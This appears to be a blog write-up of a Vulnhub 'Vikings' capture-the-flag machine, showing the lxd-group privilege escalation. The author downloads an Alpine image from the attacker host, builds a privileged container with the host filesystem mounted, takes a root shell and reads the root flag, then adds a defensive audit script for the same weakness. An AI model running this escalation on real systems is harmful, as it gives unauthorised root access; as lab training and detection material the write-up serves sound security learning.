┌──(kali㉿kali)-[~/Vulnhub/Vikings/lxd-alpine-builder]
└─$ ls
alpine-v3.13-x86_64-20210218_0139.tar.gz  build-alpine  LICENSE  README.md
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Vikings/lxd-alpine-builder]
└─$ python -m http.server 
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

However, downloading the file on the target failed; presumably port 8000 is blocked by the target's firewall, so the HTTP port needs to be changed to 80:

floki@vikings:/tmp$ wget http://192.168.56.206:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
--2022-12-09 08:44:26--  http://192.168.56.206:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
Connecting to 192.168.56.206:8000... ^C
floki@vikings:/tmp$ ping 192.168.56.206
PING 192.168.56.206 (192.168.56.206) 56(84) bytes of data.
64 bytes from 192.168.56.206: icmp_seq=1 ttl=64 time=0.324 ms
^C
--- 192.168.56.206 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.324/0.324/0.324/0.000 ms
floki@vikings:/tmp$ wget http://192.168.56.206:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
--2022-12-09 08:45:25--  http://192.168.56.206:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
Connecting to 192.168.56.206:8000... ^C
floki@vikings:/tmp$ wget http://192.168.56.206/alpine-v3.13-x86_64-20210218_0139.tar.gz
--2022-12-09 08:45:41--  http://192.168.56.206/alpine-v3.13-x86_64-20210218_0139.tar.gz
Connecting to 192.168.56.206:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3259593 (3.1M) [application/gzip]
Saving to: ‘alpine-v3.13-x86_64-20210218_0139.tar.gz’

alpine-v3.13-x86_64-20210218_01 100%[=====================================================>]   3.11M  --.-KB/s    in 0.01s   

2022-12-09 08:45:41 (209 MB/s) - ‘alpine-v3.13-x86_64-20210218_0139.tar.gz’ saved [3259593/3259593]

floki@vikings:/tmp$ ls
alpine-v3.13-x86_64-20210218_0139.tar.gz
systemd-private-58a0aa6af9df46eb8b3bac8bb71990cc-apache2.service-SaueZS
systemd-private-58a0aa6af9df46eb8b3bac8bb71990cc-systemd-resolved.service-hZO7PK
systemd-private-58a0aa6af9df46eb8b3bac8bb71990cc-systemd-timesyncd.service-SI92UJ
floki@vikings:/tmp$ 

floki@vikings:/tmp$ lxc init myimage ignite -c security.privileged=true
Creating ignite
Error: No storage pool found. Please create a new storage pool

This fails with an error saying there is no storage pool, so run `lxd init` to initialise LXD and create a storage pool:

floki@vikings:/tmp$ lxd init 
Would you like to use LXD clustering? (yes/no) [default=no]: 
Do you want to configure a new storage pool? (yes/no) [default=yes]: 
Name of the new storage pool [default=default]: 
Name of the storage backend to use (btrfs, dir, lvm) [default=btrfs]: 
Create a new BTRFS pool? (yes/no) [default=yes]: 
Would you like to use an existing block device? (yes/no) [default=no]: 
Size in GB of the new loop device (1GB minimum) [default=15GB]: 
Would you like to connect to a MAAS server? (yes/no) [default=no]: 
Would you like to create a new local network bridge? (yes/no) [default=yes]: 
What should the new bridge be called? [default=lxdbr0]: 
What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: 
What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: 
Would you like LXD to be available over the network? (yes/no) [default=no]: 
Would you like stale cached images to be updated automatically? (yes/no) [default=yes] 
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]: 
Error: Failed to create network 'lxdbr0': open /proc/sys/net/ipv6/conf/lxdbr0/autoconf: no such file or directory

Accepting every default still produced an error, this time that the network bridge could not be created. I searched online without finding a suitable fix, so I took the blunt approach: we simply do not need the network. That is, re-run the initialisation and answer `no` when asked to create the network bridge:

floki@vikings:/tmp$ lxd init
Would you like to use LXD clustering? (yes/no) [default=no]: 
Do you want to configure a new storage pool? (yes/no) [default=yes]: 
Name of the new storage pool [default=default]: 
Name of the storage backend to use (btrfs, dir, lvm) [default=btrfs]: 
Create a new BTRFS pool? (yes/no) [default=yes]: 
Would you like to use an existing block device? (yes/no) [default=no]: 
Size in GB of the new loop device (1GB minimum) [default=15GB]: 
Would you like to connect to a MAAS server? (yes/no) [default=no]: 
Would you like to create a new local network bridge? (yes/no) [default=yes]: no
Would you like to configure LXD to use an existing bridge or host interface? (yes/no) [default=no]: 
Would you like LXD to be available over the network? (yes/no) [default=no]: 
Would you like stale cached images to be updated automatically? (yes/no) [default=yes] 
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]: 

This run of `lxd init` completed without errors, which means the storage pool was created successfully, so run `lxc` again:

floki@vikings:/tmp$ lxc init myimage ignite -c security.privileged=true
Creating ignite

The container you are starting doesn't have any network attached to it.
  To create a new network, use: lxc network create
  To attach a network to a container, use: lxc network attach

floki@vikings:/tmp$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to ignite
floki@vikings:/tmp$ lxc start ignite
floki@vikings:/tmp$ lxc exec ignite /bin/sh

Although it warns that the container has no network attached, the whole procedure completes without problems, and we obtain a root shell:

/mnt # cd root
/mnt/root # ls -alh
total 2G     
drwxr-xr-x   24 root     root        4.0K Sep  3  2021 .
drwxr-xr-x    1 root     root           8 Dec  9 08:56 ..
drwxr-xr-x    2 root     root        4.0K Sep  4  2021 bin
drwxr-xr-x    4 root     root        4.0K Sep  4  2021 boot
drwxr-xr-x    2 root     root        4.0K Sep  3  2021 cdrom
drwxr-xr-x   19 root     root        3.8K Dec  9 04:47 dev
drwxr-xr-x  105 root     root        4.0K Sep  4  2021 etc
drwxr-xr-x    4 root     root        4.0K Sep  3  2021 home
lrwxrwxrwx    1 root     root          34 Sep  3  2021 initrd.img -> boot/initrd.img-4.15.0-154-generic
lrwxrwxrwx    1 root     root          34 Sep  3  2021 initrd.img.old -> boot/initrd.img-4.15.0-154-generic
drwxr-xr-x   23 root     root        4.0K Sep  3  2021 lib
drwxr-xr-x    2 root     root        4.0K Sep  3  2021 lib64
drwx------    2 root     root       16.0K Sep  3  2021 lost+found
drwxr-xr-x    2 root     root        4.0K Aug  6  2020 media
drwxr-xr-x    2 root     root        4.0K Aug  6  2020 mnt
drwxr-xr-x    3 root     root        4.0K Sep  3  2021 opt
dr-xr-xr-x  136 root     root           0 Dec  9 04:47 proc
drwx------    5 root     root        4.0K Sep  4  2021 root
drwxr-xr-x   29 root     root         980 Dec  9 08:55 run
drwxr-xr-x    2 root     root       12.0K Sep  4  2021 sbin
drwxr-xr-x    2 root     root        4.0K Sep  3  2021 snap
drwxr-xr-x    2 root     root        4.0K Aug  6  2020 srv
-rw-------    1 root     root        1.8G Sep  3  2021 swap.img
dr-xr-xr-x   13 root     root           0 Dec  9 04:47 sys
drwxrwxrwt   10 root     root        4.0K Dec  9 08:45 tmp
drwxr-xr-x   11 root     root        4.0K Sep  4  2021 usr
drwxr-xr-x   14 root     root        4.0K Sep  3  2021 var
lrwxrwxrwx    1 root     root          31 Sep  3  2021 vmlinuz -> boot/vmlinuz-4.15.0-154-generic
lrwxrwxrwx    1 root     root          31 Sep  3  2021 vmlinuz.old -> boot/vmlinuz-4.15.0-154-generic
/mnt/root # cd root
/mnt/root/root # ls -alh
total 48K    
drwx------    5 root     root        4.0K Sep  4  2021 .
drwxr-xr-x   24 root     root        4.0K Sep  3  2021 ..
lrwxrwxrwx    1 root     root           9 Sep  3  2021 .bash_history -> /dev/null
-rw-r--r--    1 root     root        3.0K Apr  9  2018 .bashrc
drwx------    3 root     root        4.0K Sep  3  2021 .cache
drwxr-xr-x    3 root     root        4.0K Sep  3  2021 .local
-rw-r--r--    1 root     root         148 Aug 17  2015 .profile
lrwxrwxrwx    1 root     root           9 Sep  3  2021 .python_history -> /dev/null
-rw-r--r--    1 root     root          66 Sep  3  2021 .selected_editor
drwx------    2 root     root        4.0K Sep  3  2021 .ssh
-rw-------    1 root     root        8.7K Sep  4  2021 .viminfo
-rw-------    1 root     root          33 Sep  3  2021 root.txt
/mnt/root/root # cat root.txt
f0b98d4387ff6da77317e582da98bf31
/mnt/root/root # 

At this point we have the root flag.
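The escalation above works because membership in the `lxd` group lets an unprivileged user create a privileged container and mount the host's root filesystem into it, after which the container's root is effectively the host's root. The following script is an added defensive example, not part of the original write-up or of LXD itself: it checks who is in root-equivalent groups and flags containers that combine `security.privileged=true` with a disk device whose source is a host path. The group file and instance description are constructed sample data; the instance JSON is assumed to have the `expanded_config` and `expanded_devices` keys that the LXD REST API exposes (for example via `lxc query /1.0/instances/<name>`).

```python
"""Audit helper for the LXD escalation path described above.

It reads a group file and an LXD instance description and reports
(1) users in groups that are effectively root-equivalent on the host and
(2) containers that are privileged and/or mount a host path as a disk device.
All inputs below are constructed sample data, not output from the target.
"""
import json

# Constructed sample of /etc/group (not copied from the target machine).
SAMPLE_GROUP_FILE = """root:x:0:
sudo:x:27:alice
lxd:x:116:floki
docker:x:999:
"""

# Constructed sample shaped like the JSON the LXD API returns for one instance.
# Assumed keys: 'expanded_config' and 'expanded_devices'.
SAMPLE_INSTANCE_JSON = json.dumps({
    "name": "ignite",
    "status": "Running",
    "expanded_config": {"security.privileged": "true", "image.os": "alpine"},
    "expanded_devices": {
        "mydevice": {"type": "disk", "source": "/", "path": "/mnt/root",
                     "recursive": "true"},
        "root": {"type": "disk", "path": "/", "pool": "default"},
    },
})

# Membership in any of these groups lets a user become root on the host.
ROOT_EQUIVALENT_GROUPS = {"lxd", "docker", "sudo", "wheel"}


def group_members(group_text):
    """Return {group: [members]} for root-equivalent groups that have members."""
    found = {}
    for line in group_text.splitlines():
        parts = line.split(":")
        if len(parts) != 4:          # skip malformed lines
            continue
        name = parts[0]
        members = [m for m in parts[3].split(",") if m]
        if name in ROOT_EQUIVALENT_GROUPS and members:
            found[name] = members
    return found


def host_path_mounts(devices):
    """Return (device_name, source) for disk devices whose source is a host path.

    A pool-backed root disk has no 'source' and is not a host mount.
    """
    hits = []
    for name, dev in devices.items():
        if dev.get("type") != "disk":
            continue
        source = dev.get("source")
        if source and source.startswith("/"):
            hits.append((name, source))
    return hits


def audit_instance(instance_json):
    """Return a list of human-readable findings for one instance description."""
    inst = json.loads(instance_json)
    cfg = inst.get("expanded_config", {})
    devs = inst.get("expanded_devices", {})
    findings = []
    privileged = cfg.get("security.privileged") == "true"
    if privileged:
        findings.append(
            f"{inst['name']}: security.privileged=true "
            "(uid 0 in the container is uid 0 on the host)")
    for dev, src in host_path_mounts(devs):
        # A host mount inside a privileged container is a full host compromise;
        # in an unprivileged one it is still a data-exposure risk.
        severity = "CRITICAL" if privileged else "WARNING"
        findings.append(
            f"{inst['name']}: {severity} disk device '{dev}' mounts host path {src}")
    return findings


if __name__ == "__main__":
    for group, members in group_members(SAMPLE_GROUP_FILE).items():
        print(f"root-equivalent group '{group}' has members: {', '.join(members)}")
    for finding in audit_instance(SAMPLE_INSTANCE_JSON):
        print(finding)
```

On a real host the group data would come from `/etc/group` and the instance description from the LXD API; the remediation is to remove ordinary users from the `lxd` group and to treat `security.privileged` plus host-path disk devices as a change that needs review.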

Lessons learned

  1. When analysing image files, do not forget binwalk in the toolset.

Posted @ 2022-12-09 17:16 by Jason_huawen, 550 views, 0 comments